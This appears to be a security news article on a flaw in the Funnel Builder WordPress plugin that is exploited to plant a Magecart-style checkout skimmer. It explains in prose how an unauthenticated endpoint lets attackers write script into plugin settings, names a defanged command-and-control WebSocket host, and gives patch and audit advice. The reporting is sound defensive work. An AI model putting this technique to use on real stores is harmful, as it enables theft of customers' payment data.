WooCommerce Funnel Builder Flaw Under Exploitation Enables Checkout Skimming

A critical vulnerability in the Funnel Builder plugin for WordPress, used by over 40,000 WooCommerce stores, is being actively exploited to inject malicious JavaScript into checkout pages, allowing attackers to steal payment data. The flaw, which has no official CVE identifier, affects all versions prior to 3.15.0.3. Sansec researchers documented the campaign this week, noting that attackers are abusing an unprotected endpoint to write arbitrary script content into the plugin's external scripts setting.

The exposed endpoint, present in older releases, never validated caller permissions or restricted which internal methods could be invoked. By sending an unauthenticated request to the endpoint, a threat actor can reach an internal method that directly stores attacker‑controlled data in the plugin’s global settings. The injected payload mimics a standard Google Tag Manager loader, making it look like ordinary analytics to reviewers while loading a payment skimmer that captures credit‑card numbers, CVVs and billing addresses on every transaction. FunnelKit, the developer behind Funnel Builder, released patch version 3.15.0.3 to address the issue.

In observed attacks, the malicious script opens a WebSocket connection to a command‑and‑control server at wss://protect‑wss[.]com/ws, retrieving a customized skimmer tailored to the compromised storefront. This technique aligns with classic Magecart tactics, where skimmers disguise themselves as familiar tracking tags to avoid detection. The resulting data exfiltration can lead to financial fraud and expose customers to identity theft.

Site owners should immediately update Funnel Builder to version 3.15.0.3 and audit Settings > Checkout > External Scripts for any unfamiliar entries, removing them without delay. Implementing additional security checks such as running an SSL/TLS checker to verify certificate integrity, scanning for exposed services with a port scanner, and verifying whether any email credentials have been compromised via an email breach checker can help mitigate risk and detect potential fallout from this campaign.